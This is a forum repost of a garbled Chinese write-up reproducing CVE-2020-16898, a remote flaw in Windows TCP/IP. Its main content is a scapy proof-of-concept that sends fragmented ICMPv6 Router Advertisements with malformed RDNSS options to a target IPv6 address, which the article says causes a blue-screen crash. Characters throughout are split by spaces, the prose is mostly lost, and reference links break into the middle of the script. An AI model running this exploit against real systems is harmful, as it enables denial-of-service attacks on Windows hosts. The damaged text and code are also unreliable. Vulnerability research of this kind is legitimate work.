搜索

[7008] 2020-10-26_CVE-2020-16898Windowstcpip远程代码执行漏洞复现

文档创建者:s7ckTeam
浏览次数:8
最后更新:2025-01-17
2020-10-26_CVE-2020-16898Windowstcpip远程代码执行漏洞复现 C V E - 2 0 2 0 - 1 6 8 9 8   W i n d o w s   t c p / i p E   2 0 2 0 - 1 0 - 2 6   W i l l 使 N o . 1 N o . 1 w i n d o w s   1 0 p y t h o n 3 . 7 s c a p y w i n d o w s 1 0   1 9 0 9 i p v 6 c m d i p c o n f i g i p v 6   . f d 1 5 : 4 b a 5 : 5 a 2 b : 1 0 0 8 : 8 c 9 a : 8 a 2 b : 4 4 8 9 : 7 4 a a
i p v 6 i p v 6 i p v 6 i p v 6 i p v 6 i p v 6 N o . 2 N o . 2 2 . 1   2 0 2 0 1 0 1 4   M i c r o s o f t     T C P / I P W i n d o w s   T C P / I P I M C P v 6   R o u t e r   A d v e r t i s e m e n t I C M P v 6   R o u t e r   A d v e r t i s e m e n t   W i n d o w s B S O D C V E - 2 0 2 0 - 1 6 8 9 8 2 . 2   r f c 5 0 0 6   R D N S S l e n g t h R D N S S L e n g t h W i n d o w s   T C P / I P   L e n g t h   A d d r e s s e s   o f   I P v 6   R e c u r s i v e   D N S   S e r v e r s     R D N S S   o p t i o n 2 . 3 p a y l o a d f e 8 0 : : 9 8 3 5 : b 7 b a : c 8 1 3 : 5 f 6 a % 1 0 f r o m   s c a p y . a l l   i m p o r t   * f r o m   s c a p y . l a y e r s . i n e t 6   i m p o r t   I C M P v 6 N D O p t E F A ,   I C M P v 6 N D O p t R D N S S ,   I C M P v 6 N D _ R A ,   I P v 6 ,   I P v 6 E x t H d r F r a g m e n t ,   f r a g m e n t 6   v 6 _ d s t   =   " f d 1 5 : 4 b a 5 : 5 a 2 b : 1 0 0 8 : 1 0 9 f : 9 a 4 6 : 8 d 1 9 : f 1 0 3 " v 6 _ s r c   =   " f e 8 0 : : 5 0 1 a : 4 9 b 7 : b 7 d : 5 3 6 2 % 1 2 "   p _ t e s t _ h a l f   =   ' A ' . e n c o d e ( ) * 8   +   b " x 1 8 x 3 0 "   +   b " x F F x 1 8 " p _ t e s t   =   p _ t e s t _ h a l f   +   ' A ' . e n c o d e ( ) * 4   c   =   I C M P v 6 N D O p t E F A ( )   e   =   I C M P v 6 N D O p t R D N S S ( ) e . l e n   =   2 1 e . d n s   =   [ " A A A A : A A A A : A A A A : A A A A : F F F F : A A A A : A A A A : A A A A " , " A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A " , " A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A " , " A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A " , " A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A " , " A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A " , " A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A " , " A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A " , " A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A " ,
p a y l o a d i p v 6 w i r e s h a r k h t t p s : / / g i t h u b . c o m / C P O - E H / C V E - 2 0 2 0 - 1 6 8 9 8 _ C h e c k e r / b l o b / m a i n / C V E - 2 0 2 0 - 1 6 8 9 8 _ C h e c k e r . p s 1 h t t p s : / / b l o g . c s d n . n e t / m u k a m i 0 6 2 1 / a r t i c l e / d e t a i l s / 1 0 9 1 6 5 5 7 4 h t t p s : / / c e r t . 3 6 0 . c n / r e p o r t / d e t a i l i d = 7 7 1 d 8 d d c 2 d 7 0 3 0 7 1 d 5 7 6 1 b 6 a 2 b 1 3 9 7 9 3 h t t p s : / / b l o g . c s d n . n e t / h s j _ c s d n / a r t i c l e / d e t a i l s / 1 0 9 1 3 8 1 6 2 " A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A " , " A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A : A A A A "   ] a a a   =   I C M P v 6 N D O p t R D N S S ( ) a a a . l e n   =   8 p k t   =   I C M P v 6 N D _ R A ( )   /   a a a   /               R a w ( l o a d = ' A ' . e n c o d e ( ) * 1 6 * 2   +   p _ t e s t _ h a l f   +   b " x 1 8 x a 0 " * 6 )   /   c   /   e   /   c   /   e   /   c   /   e   /   c   /   e   /   c   /   e   /   e   /   e   /   e   /   e   /   e   /   e   p _ t e s t _ f r a g   =   I P v 6 ( d s t = v 6 _ d s t ,   s r c = v 6 _ s r c ,   h l i m = 2 5 5 ) /                               I P v 6 E x t H d r F r a g m e n t ( ) / p k t   l = f r a g m e n t 6 ( p _ t e s t _ f r a g ,   2 0 0 )   f o r   p   i n   l :         s e n d ( p )
E   h t t p s : / / w w w . e a s y a q . c o m 5     T r i c k b o t 9 4 % 使 稿     1 5 5 5 8 1 9 2 9 5 9     E E a n q u a n 0 9 1 4 E
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理